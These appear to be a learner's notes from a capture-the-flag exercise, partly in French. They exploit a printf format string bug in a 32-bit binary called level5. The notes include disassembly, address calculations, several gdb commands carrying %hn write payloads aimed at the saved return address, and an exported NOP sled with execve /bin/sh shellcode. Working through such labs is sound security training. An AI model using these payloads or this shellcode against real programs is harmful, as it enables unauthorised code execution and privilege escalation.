
n:
0x080484c2 <+0>:	push   %ebp
0x080484c3 <+1>:	mov    %esp,%ebp

0x080484c5 <+3>:	sub    $0x218,%esp ; 536
0x080484cb <+9>:	mov    0x8049848,%eax
0x080484d0 <+14>:	mov    %eax,0x8(%esp)
0x080484d4 <+18>:	movl   $0x200,0x4(%esp) ; 512
0x080484dc <+26>:	lea    -0x208(%ebp),%eax
0x080484e2 <+32>:	mov    %eax,(%esp)
0x080484e5 <+35>:	call   0x80483a0 <fgets@plt> fgets(buffer, 512, stdin);
0x080484ea <+40>:	lea    -0x208(%ebp),%eax
0x080484f0 <+46>:	mov    %eax,(%esp)
0x080484f3 <+49>:	call   0x8048380 <printf@plt>
0x080484f8 <+54>:	movl   $0x1,(%esp)
0x080484ff <+61>:	call   0x80483d0 <exit@plt>

main:
0x08048504 <+0>:	push   %ebp
0x08048505 <+1>:	mov    %esp,%ebp
0x08048507 <+3>:	and    $0xfffffff0,%esp
0x0804850a <+6>:	call   0x80484c2 <n>
0x0804850f <+11>:	leave
0x08048510 <+12>:	ret

eip : 0xbfffce0c
adresse du shellcode : 0xbffff047

0xbfff : 49151
0xf047 : 61511

0xf047 - 0xbfff : 12360

On ecrit 0xbfff à 0xbfffce0c
On ecrit 0xf047 à 0xbffff530

0xBFFFD038

gdb /home/user/level5/level5 -ex "set args < <(python -c \"print '\x0e''\xce''\xff''\xbf' + 'aaaa' + '\x0c''\xce''\xff''\xbf' + '%08x.' * 2 + '%049121x' + '%hn' + '%012360x' + '%hn'\")"

gdb /home/user/level5/level5 -ex "set args < <(python -c \"print '\x15''\xce''\xff''\xbf' + 'aaaa' + '\x13''\xce''\xff''\xbf' + '%08x.' * 2 + '%049121x' + '%hn' + '%012360x' + '%hn'\")"

gdb /home/user/level5/level5 -ex "set args < <(python -c \"print '%08x.' * 50\")"

gdb /home/user/level5/level5 -ex "set args < <(python -c \"print '\xde''\xd4''\xff''\xbf' + 'aaaa' + '\xdc''\xd4''\xff''\xbf' + '%08x.' * 2 + '%049121x' + '%hn' + '%012360x' + '%hn'\")"

012345678901234567980123
0123456789012345679

export BINSH=`python -c "print '\x90' * 10000 + '\x31''\xc0''\x50''\x68''\x2f''\x2f''\x73''\x68''\x68''\x2f''\x62''\x69''\x6e''\x89''\xe3''\x50''\x53''\x89''\xe1''\xb0''\x0b''\xcd''\x80'"`
